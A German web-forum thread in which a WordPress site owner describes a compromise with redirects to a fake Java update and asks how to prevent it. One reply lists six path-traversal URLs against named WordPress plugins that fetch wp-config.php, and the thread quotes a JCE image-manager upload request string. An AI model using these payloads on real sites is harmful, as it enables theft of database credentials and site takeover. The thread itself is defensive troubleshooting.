Hallo, ich wusste nicht wohin ich das folgende Thema schrfeiben soll.. deswegen hier

  • Ich habe eine Webseite mit Wordpress realisiert,
    gestern schaute ich dann mal drauf und offensichtlich wurde mit in meine Webseite Schadsoftware integriert.
    nach 1 Million Klicks kam ich noch auf die Administrationsoberfläche wo ich dann folgendes gefunden habe.

    Code
    /?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

    hat jemand einen Tip für mich wie ich das in Zukunft verhindern kann ?

    Einmal editiert, zuletzt von Rodrigez (20. Oktober 2014 um 08:59)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Zitat

    offensichtlich wurde mit in meine Webseite Schadsoftware integriert

    woraus schliesst du das?

    Zitat

    /?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

    wo hast du das gefunden und warum soll es Schadcode sein?

  • Ich schliesse es daraus, dass ich auf eine Download-Seite umgeleitet wurde die ein """"Java-Update""" installieren wollte,
    Desweiteren ist Werbung und Pornobilder auf der Webseite gezeigt worden.

    Dieser exploid wird dazu da sein, um Schadsoftware zu installieren bzw. die Webseite zu infiltrieren.
    leider habe ich dazu nichts gefunden.. deshalb hab ich den threat aufgemacht

    Rod zum Gruß

  • Keiner eine Idee ?

    dies ist zuerst einmal eine sammlung von get variablen und kein exploid

    ?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

    sollte dein plugin "imgmanager" oder dein template eine uplaod klasse haben

    beispiele für exploid

    wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
    wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
    wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php
    wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
    wp-content/force-download.php?file=../wp-config.php
    wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php

    wenn das Plugin
    plugin=imgmanager
    auch Scripte hochgeladen hat - solltest du dich von dem plugin trennen und eine datensicherung verwenden...

    Mit offenen Augen träumen

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!